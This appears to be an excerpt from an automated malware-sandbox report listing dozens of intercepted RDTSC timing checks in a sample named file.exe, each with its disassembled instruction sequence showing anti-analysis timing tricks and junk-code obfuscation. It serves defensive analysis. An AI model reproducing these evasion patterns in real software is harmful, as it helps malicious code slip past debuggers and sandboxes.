            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 441CAA second address: 441CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442B91 second address: 442BE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F2E7D1D3438h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov bh, 3Dh 0x00000025 push 00000000h 0x00000027 jmp 00007F2E7D1D343Ah 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f jmp 00007F2E7D1D343Dh 0x00000034 pop ebx 0x00000035 xchg eax, esi 0x00000036 push ebx 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 441CB0 second address: 441CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2E7D257EC7h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 js 00007F2E7D257EB6h 0x00000019 pop edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442BE1 second address: 442BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push ecx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 441CDC second address: 441CEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E7D257EBFh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 444B40 second address: 444B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 444B46 second address: 444B4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 444B4A second address: 444BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F2E7D1D3438h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 jne 00007F2E7D1D3436h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007F2E7D1D3438h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 443C1B second address: 443C26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F2E7D257EB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 443C26 second address: 443C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 443C34 second address: 443C43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 443C43 second address: 443CDA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F2E7D1D343Ch 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F2E7D1D3438h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 sub dword ptr [ebp+122D17C6h], eax 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov ebx, dword ptr [ebp+122D337Fh] 0x00000039 mov edi, dword ptr [ebp+122D386Eh] 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 clc 0x00000047 mov eax, dword ptr [ebp+122D152Dh] 0x0000004d push 00000000h 0x0000004f push eax 0x00000050 call 00007F2E7D1D3438h 0x00000055 pop eax 0x00000056 mov dword ptr [esp+04h], eax 0x0000005a add dword ptr [esp+04h], 00000019h 0x00000062 inc eax 0x00000063 push eax 0x00000064 ret 0x00000065 pop eax 0x00000066 ret 0x00000067 movsx ebx, cx 0x0000006a mov edi, dword ptr [ebp+122D359Dh] 0x00000070 push FFFFFFFFh 0x00000072 and edi, 7D9C120Fh 0x00000078 nop 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c push edx 0x0000007d pop edx 0x0000007e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4459C1 second address: 445A3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2E7D257EC0h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F2E7D257EB8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a stc 0x0000002b push 00000000h 0x0000002d jc 00007F2E7D257EBCh 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F2E7D257EB8h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f xchg eax, esi 0x00000050 pushad 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 445A3B second address: 445A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D343Eh 0x00000009 popad 0x0000000a ja 00007F2E7D1D343Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push ebx 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 444DEF second address: 444DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446B44 second address: 446B49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 448A92 second address: 448AC9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2E7D257EB8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d sub edi, 7AD1D640h 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+124511EAh], ebx 0x0000001b push 00000000h 0x0000001d xor dword ptr [ebp+122D2AE5h], eax 0x00000023 xchg eax, esi 0x00000024 jc 00007F2E7D257EBCh 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 447C32 second address: 447C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D343Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 448AC9 second address: 448ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 448ACD second address: 448AD7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2E7D1D3436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 447CD6 second address: 447CED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F2E7D257EB6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 jng 00007F2E7D257EB6h 0x00000016 pop ebx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 449B1F second address: 449B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 449B23 second address: 449B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44CCD9 second address: 44CCF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D343Ch 0x00000009 pop ecx 0x0000000a push edx 0x0000000b jbe 00007F2E7D1D3436h 0x00000011 pop edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F837F second address: 3F8387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44D328 second address: 44D32E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44D3DD second address: 44D3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44D57C second address: 44D586 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2E7D1D3436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44F54E second address: 44F555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44F555 second address: 44F55F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2E7D1D343Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44D586 second address: 44D660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnc 00007F2E7D257EC0h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F2E7D257EB8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b jg 00007F2E7D257EC5h 0x00000031 push dword ptr fs:[00000000h] 0x00000038 pushad 0x00000039 jmp 00007F2E7D257EC6h 0x0000003e mov dword ptr [ebp+122D27FDh], eax 0x00000044 popad 0x00000045 mov dword ptr fs:[00000000h], esp 0x0000004c push 00000000h 0x0000004e push edi 0x0000004f call 00007F2E7D257EB8h 0x00000054 pop edi 0x00000055 mov dword ptr [esp+04h], edi 0x00000059 add dword ptr [esp+04h], 0000001Dh 0x00000061 inc edi 0x00000062 push edi 0x00000063 ret 0x00000064 pop edi 0x00000065 ret 0x00000066 mov dword ptr [ebp+122D286Dh], ebx 0x0000006c mov eax, dword ptr [ebp+122D07D9h] 0x00000072 mov bx, 96D7h 0x00000076 push FFFFFFFFh 0x00000078 cld 0x00000079 jmp 00007F2E7D257EBBh 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 jo 00007F2E7D257EBCh 0x00000087 jng 00007F2E7D257EB6h 0x0000008d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44D660 second address: 44D66A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F2E7D1D3436h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44F55F second address: 44F5DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jo 00007F2E7D257EB9h 0x0000000d movsx edi, dx 0x00000010 mov edi, dword ptr [ebp+122D31B3h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F2E7D257EB8h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 adc edi, 64F5D412h 0x00000038 mov ebx, dword ptr [ebp+12461F35h] 0x0000003e push 00000000h 0x00000040 call 00007F2E7D257EBFh 0x00000045 mov dword ptr [ebp+122D30C9h], ebx 0x0000004b pop edi 0x0000004c xchg eax, esi 0x0000004d jns 00007F2E7D257EC7h 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44F5DF second address: 44F5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44F5E3 second address: 44F5E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45058B second address: 450591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 450591 second address: 450595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4516B8 second address: 4516BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4516BD second address: 451733 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, dword ptr [ebp+122D3161h] 0x00000012 mov dword ptr [ebp+122D19C5h], edi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F2E7D257EB8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 mov bh, C0h 0x00000036 push 00000000h 0x00000038 mov ebx, dword ptr [ebp+122D3936h] 0x0000003e xchg eax, esi 0x0000003f jmp 00007F2E7D257EC6h 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 jg 00007F2E7D257EB6h 0x0000004e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 450864 second address: 450875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F2E7D1D3438h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 450875 second address: 45087A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45D4C4 second address: 45D50E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D343Bh 0x00000007 je 00007F2E7D1D3436h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f ja 00007F2E7D1D3448h 0x00000015 jmp 00007F2E7D1D3442h 0x0000001a jmp 00007F2E7D1D343Bh 0x0000001f popad 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F2E7D1D343Ch 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45D50E second address: 45D512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EC697 second address: 3EC69E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4648A8 second address: 4648BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4648BD second address: 4648EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3444h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 jmp 00007F2E7D1D3441h 0x00000016 pop eax 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4648EF second address: 464923 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F2E7D257EC8h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F2E7D257EBBh 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464A14 second address: 464A1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F2E7D1D3436h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464A1E second address: 464A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46B9FE second address: 46BA07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46BA07 second address: 46BA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2E7D257EB6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F2E7D257EB6h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46BA1C second address: 46BA26 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2E7D1D3436h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FD44A second address: 3FD469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2E7D257EC7h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FD469 second address: 3FD482 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3445h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46A7A3 second address: 46A7A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46AD55 second address: 46AD5D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46AEE4 second address: 46AEEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46AEEA second address: 46AEEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46AEEE second address: 46AEF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46B019 second address: 46B01D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46B14E second address: 46B174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jnc 00007F2E7D257ECFh 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46B174 second address: 46B1A7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2E7D1D3446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F2E7D1D3447h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46B2CF second address: 46B2ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2E7D257EC5h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46B5F9 second address: 46B5FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46EB54 second address: 46EB59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46EB59 second address: 46EB5E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46EB5E second address: 46EB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jnl 00007F2E7D257EB8h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jmp 00007F2E7D257EBBh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46EB7D second address: 46EB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46EB82 second address: 46EB8E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 473221 second address: 473229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 473229 second address: 473244 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2E7D257EB6h 0x00000008 jmp 00007F2E7D257EBEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 473754 second address: 473759 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 473759 second address: 473763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4738A7 second address: 4738AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 473B7D second address: 473B81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 474173 second address: 474179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 474179 second address: 47417D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 472B45 second address: 472B57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D343Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4796C5 second address: 4796C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
